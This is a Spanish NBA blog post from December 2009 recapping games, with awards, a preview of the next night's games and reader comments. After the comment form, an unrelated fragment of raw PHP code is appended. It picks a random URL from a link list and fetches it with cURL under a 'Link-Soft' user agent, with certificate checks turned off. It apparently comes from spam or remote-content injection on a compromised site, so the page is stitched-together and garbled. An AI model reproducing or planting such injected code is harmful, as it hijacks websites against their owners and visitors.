La Crónica (14/12/2009)

15 de December de 2009 por txusma

Ganó Iverson por fin, en una noche comedida ganándole por la mano precísamente a Monta Ellis. Los Warriors dieron demasiadas facilidades sobretodo bajo tableros donde los Sixers les sacaron ni más ni menos que 33 rebotes de diferencia. 14 de ellos cayeron en manos de Thaddeus Young que fue el mejor y parece condenar a Elton Brand definitivamente a la suplencia. Iguodala también sigue de psiquiatra con unos nefastos porcentajes de tiro y un buen número de pérdidas. Estos dos señores son los que estaban llamados a llevar las riendas del equipo. Así les va.

La jornada a priori era de “potaje de garbanzos” con choques desequilibrados y partidos de medio pelo.  Pero conforme se puso en marcha se animó y de qué manera. La sorpresa saltó en el Energy de Utah, donde el soñado suplente de Ricky Rubio le birló el choque en el último instante al mismísimo Deron Williams. Love&Jefferson dominaron los tableros para evitar que los Jazz controlaran el partido y una tanda impresentable de errores desde la línea de ltiros ibres llevaron el partido al limbo. En esta ocasión las musas sonrieron a los Wolves y sacaron a los Jazz de la resaca de un jarrazo de agua helada.

Todavía con el susto en el cuerpo amanecerán los Celtics. Por el canto de un duro no cayeron en Memphis. Marc&Randolph empataron el duelo frente a Garnett&Perkins pero una casi inmaculada serie de triples de Allen&Pierce (8 de 9 frente a los 1 de 11 de Gay&Mayo) se llevaron el gato al agua para acumular la 11ª victoria de la racha.

Otro partido que cayó en el filo de la navaja fue el Wizards-Clippers en el Staples. Otra vez le dieron el “clutch” al pequeño Boyquins pero en esta ocasión no salió bien. El duelo de viejas glorias “Baron vs Arenas” rozó lo esperpéntico (6 de 28 entre los dos machines). Fue el Butler&Jamison vs Gordon&Kaman la verdadera miga del encuentro.

En Dallas, los reservas de los Hornets estuvieron a punto de suplir la desgracia de compañeros titulares que tiene Chris Paul. No vimos al Nowitzki de otras tardes, pero Kidd aguantó el tipo y la tríada Barea-Terry-Howard logró, no sin sufrimiento, conservar la 2ª plaza del Oeste.

Para terminar, Dwight Howard arrasó el juego interior de Indiana y aún así les costó llevarse el partido, con un Dunleavy como en las mejores noches. Algo sigue sin oler bien en Orlando. Lo venimos avisando.

PREMIOS

MVP: Thaddeus Young ha resultado clave con sus 26 puntos, 14 rebotes, 4 asistencias y 3 robos  para romper la racha de partidos pérdidos de los Sixers, pero de todas maneras su actuación queda lejos de los 21 puntos y 23 rebotes de  Dwight Howard. Descomunal.

Rookie: El rookie de los Grizzlies, Hasheem Thabeet, mejroa poco a poco y hoy en apenas 18 minutos de juego ha capturado 8 rebotes y puesto 4 tapones. Sin duda, su gran especialidad. En el aspecto anotador ha destacado Johnny Flynn con 28 puntos en 26 minutos pero en general el premio es para Jrue Holiday, con sus 15 puntos, 7 rebotes y 6 asistencias. A ver si se va a entender bien con Allen Iverson…

Sorpresa: Las lesiones parecen tener ganas de hacernos olvidar la gran clase de Mike Dunleavy pero este vuelve una y otra vez para recordarnos que sigue jugando a baloncesto. Ayer fue el mejor de su triste equipo con 26 puntos. Haciendo menos ruído todavía, Juan José Barea se ha hecho con el puesto de titular esta última semana. Con actuaciones como las de ayer (23 puntos con 10 de 13 en tiro) será complicado quitarle el sitio.

Decepción: 2 jugadores cortados por el mismo patrón, Monta Ellis y Gilbert Arenas que ayer restaron más que sumaron a sus respectivos equipos. 3 de 14 en tiro para el primero y 4 de 14 más 6 pérdidas para el segundo.

Esfuerzo en vano: El de 4 jugadores de nivel AllStars. Chris Paul (20 puntos, 16 asistencias, 5 robos), Deron Williams (38 puntos y 13 asistencias), Kevin Durant (32 puntos y 10 rebotes) y Antawn Jamison (32 puntos y 11 rebotes).

RAZONES PARA TRASNOCHAR

La madrugada del martes al miércoles trae siete partidos en los que predomina la igualdad, con excepción hecha de la visita de los Nets al Quicken Loans Arena de Cleveland (1h00). En teoría también se presenta desequilibrado el Lakers-Bulls (2h00), aunque la derrota en Utah, la fractura en el dedo de Kobe y las críticas de Pau por no recibir balones abren un interrogante en el rendimiento angelino en esta gira por el Este que hoy empieza. Tenemos curiosidad por ver, en su visita a Charlotte (1h00), a los revividos Knicks, inmersos en una racha de 4 victorias y desatados por momentos (como en su reciente encuentro ante los Hornets, ante los que rompieron el partido anotando los últimos 18 puntos). Los Raptors, de nuevo sin Calderón, viajan a Miami (1h30); los Pistons pondrán a prueba su racha de 5 victorias seguidas en pista de los Rockets (2h30), que no contarán con Ariza tras su puñetazo a DeRozan. Lo mejor de la noche llegará a las 3h00, con uno de los grandes duelos de temporadas no muy lejanas, el Spurs-Suns. Los de Popovich, con Ginóbili en su mejor momento en mucho tiempo, visitan la única cancha que sólo ha visto victorias locales hasta la fecha. Cierran la jornada Kings y Blazers a las 4h00 en un enfrentamiento más igualado de lo que cualquiera prodría haber imaginado a principio de temporada.

VIDEO

Atentos a la jugada número 7. ¿Alguien consigue ver la pelota antes de que la machaque Okafor? ¡Vaya mago, Chris Paul! ¿Y la asistencia de Billups por debajo de las piernas? ¿Y el movimiento de Deron Williams llevando el contraataque? Como nos gusta este deporte…

Comenta

11 comentarios a esta entrada

  1. Chris dice:
    #1

    Es cierto algo huele mal en Orlando, la gestión de Van Gundy vuelve a despertar dudas ¿por qué Carter tiene más bola que Howard? ¿por qué Brandon Bass ha quedado desterrado, si con él se suponía que se iba a optar por un quinteto alternativo con un PF al uso, mejorando así las opciones tácticas? ¿por qué el puesto de small forward desde la salida de Turkoglu es el que está despertando más dudas, con un Pietrus que ahí pinta muy poco teniendo a Rashard y a un Anderson que lo ha hecho muy bien hasta ahora? ¿El polaco está missing, ya hay rumores de traspaso? Si no llegan a finales de conferencia veo la cabeza de “Ron Jeremy” rodando.
    Dos apuntes para dos jugadores que me gustan en plena “resurrección” el citado Mike Dunleavy que como comentais es muy bueno y ha vuelto a lo grande (a los Pacers les va a venir de perillas con la lesión de Granger). Y por Darius Songaila al cual parece que se le están dando minutos y algo de confianza ayer 6 de 6 en TC y dos rebotes en 11 minuto, tal como está West igual debería robarle algún minuto más y así poder serguir demostrando que es un tío serio y solvente.
    Por cierto parece que AI3 lo hizo bastante bien…

      Citar

  2. TheDeerHunter dice:
    #2

    Pues el sábado iba a hablar precísamente de Orlando cuando nos cascó el blog.
    Esto lo escribió Paniagua en MAYO: http://www.solobasket.com/blogs/comentarios/miguel/angel/paniagua/svg/c-550.html
    En junio asistimos a la cagada de los bases en la mismísima final… me llamó la atención la carica con la que sus jugadores atendían sus “exabruptos”. Reflejaba la más absoluta falta de fe… y casi de respeto.

    Para mí, son la plantilla más completa de largo de la liga, sobre todo, atendiendo a cómo está rindiendo Ryan Anderson y cómo están cumpliendo Jason Williams y Anthony Johnson. Y el caso, que yo no le reprocho a SVG tanto como otros… quitando la GRAN cagada de las finales y eso que dice Paniagua que habla demasiado fuera y grita demasiado dentro… me hubiera parecido demasiado fuerte que le hubieran tirado tras la final. Supongo que ahí está el kit de la cuestión.

    Qué mal huele todo aquello. A mí me da la sensación de que haga lo que haga está condenado y la cagada es que los resultados no les dejan tirarlo. Diría que su único apoyo en la plantilla puede ser Nelson… y quizás ahora Carter. Pero es que no entiendo lo de Howard… no me cabe en la cabeza. Y lo de Lewis… el otro día por lo visto hubo broncazo público y negativa del jugador a salir a jugar. Es que a este tipo se le debería caer el pelo si tuvieran el más mínimo de respeto hacia el entrenador.
    Después revisas los últimos instantes frente a los Suns y es de traca. No tanto por la pérdida de balón de Anthony (aunque yo no puedo olvidar la carica que tenía en las finales del año pasado) como por el rebote ofensivo de Stoudamire (sin hablar del super-mega-sospechoso-palizón que le había dado a Howard previamente) para perder el partido. Ese rebote no se lo creen ni ellos…
    ¿y lo de Bass?? ya me lo explicarán algún día…

    Lo dicho. No entiendo nada. Igual es por esto por lo que me vienen estas paranoias… pero…

      Citar

  3. sergio dice:
    #3

    Parece que a Elton Brand le viene bien salir desde el banquillo. Estos ultimos 2-3 partidos lo ha hecho dignamente, aportando en poco tiempo buenos numeros. Se que los Warriors no son una buena prueba para ver aportaciones individuales pero quizas le venga bien la competencia y la motivacion de tener alguien delante.

    Los Grizzlies juegan muy bien por momentos. Comienzan a ser un equipo peligroso para cualquiera. Dudaba muchisimo de Randolph y aun no ha levantado la voz en toda la temporada, cumpliendo siempre. Quizas en Playoffs no tengan posibilidades (si entran en Playoffs les presupongo un 7º-8º puesto) pero si juegan como hasta ahora van a pelear por entrar, algo que pocos pensabamos a estas comienzos de temporada. Hasta Thabbeet empieza a ser importante en la rotacion. Quizas falte alguien que de calidad en la rotacion exterior pero por ahora deberian darse con un canto en los dientes.

    P.D: Por favor, Deron y Jamison All-Star… incluso alguien de Atlanta… hagamos votacion en masa!!!

      Citar

  4. TheDeerHunter dice:
    #4

    Lo de alguien de Atlanta es de cajón, lo de Deron… igual, lo de Jamison tengo bastantes más dudas.

    Lamento decir que hemos olvidado mencionar (culpa mía y no de Txusma que la firma) el pedazo de duelo anoche entre Melo y Durant. Ojo porque en lo individual ganó la partida Durant (y eso son palabras mayores por como está jugando Melo este año)
    Y los Thunder otro hueso duro… más en el Oeste

      Citar

  5. Viva_Dirk dice:
    #5

    Estoy con Deer, creo que en Orlando estan locos por cargarse a Van Gundy y además hay varios jugadores que no le hacen ni puto caso.

    Y no estamos hablando mucho de ellos, pero si Dampier mantiene el nivel y llegan con todos sanos a los play-offs los Mavs van a ser de lo mas peligroso del Oeste.

      Citar

  6. pcerezo dice:
    #6

    Dampier jugador bajo sospecha. Año de contrato y ya se sabe a buscarse las castañas….
    Orlando ganará alrededor de 55 partidos este año y semis de conferencia seguras pero creo que eso ya no es bastante.
    Durant futura megaestrella de la liga. En un par de años está entre los tres o cuatro mejores de la liga. Su progresión es fantástica por ahora una carrera muy bien llevada.
    Josh Smith y Joe Johnson tienen que ser All Star sí o sí sin duda.

    Un saludo,
    Pablo

      Citar

  7. sergio dice:
    #7

    Se perfectamente porque dudas que Jamison vaya al All-Star Deer… pero sus numeros son de estrella y creo q merece mas reconocimiento del que siempre ha tenido. Es un perfecto currante en cualquiera de las posiciones de forwards. Tiene mucha competencia y otros quizas lo merezcan mas pero a mi siempre a sido un jugador que me ha encantado. Con 33 años ha subido en casi todo respecto al año pasado (eso si, el 56% en libres… imperdonable)

    Yo tambien dudo del nivel de Dampier pero aun asi deberian ser los mas peligrosos del Oeste con Spurs y Denver. Lakers aparte claro

      Citar

  8. Love Denise dice:
    #8

    Como seguidor de los Magic, y siendo éste el equipo del que más partidos veo, hasta ahora consideraba a SVG un magnifico entrenador, pero las rotaciones y la manera de repartir los tiros son infumables. Canta muchísimo los 3 grandes problemas: muchos tiros de Carter, pocos balones a Howard, y no hay minutos para Bass y Gortat. No obstante, sigo pensando que son la mejor plantilla con muchíiiiisima diferencia de la Liga, y que sí logran solucionar estos problemas, se pasearán por la Conferencia Este y a luchar contra el equipo Angelino, o mejor dicho, contra su quinteto + 2.
    @Chris: no estoy de acuerdo contigo, cuando dices que Pietrus no pinta nada ahí. Para mí, Pietrus es básico en los Magic, atrás es un perro de presa que puede defender a todo tipo de exteriores, desde a un Kobe a un Lebron. Y en ataque, se pone en la esquinita y aprovecha muy bien el hecho de que Carter, Howard y Lewis les deje sólo, enchufándola de 3 en 3, cosa impensable hace algunos años (41/101 triples en 22 partidos, lo firmaría cualquier tirador).
    Por otra parte, veo que Dallas es el único equipo del Oeste que le podría hacer algo de pupa a Lakers en Playoffs, no terminan de convencerme Spurs, Nuggets o Suns para derrotar al equipo de púrpura y oro en una serie.
    No os parece que Bynum, Gasol y Bryant están ahora mismo en sus mejores momentos de sus carreras? No me refiero estadisticamente, sino lo que aportan al equipo de manera global.

      Citar

  9. Viva_Dirk dice:
    #9

    Me parece que los Magics no se pasean frente a Boston ni naciendo 100 veces. Pueden ganarlos pero si lo hacen será pasandolo fatal.

      Citar

  10. Love Denise dice:
    #10

    Esa es tu opinion y la respeto, pero a mí no me convencen mucho este año, a pesar de la buena marca que llevan, creo que le falta mucho banquillo, y los años de Garnett y Allen empezarán a notarse pronto.

      Citar

  11. kantonyo dice:
    #11

    Es imaginación mía o estos Grizzlies son cada vez más consistentes y mejor equipo???

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>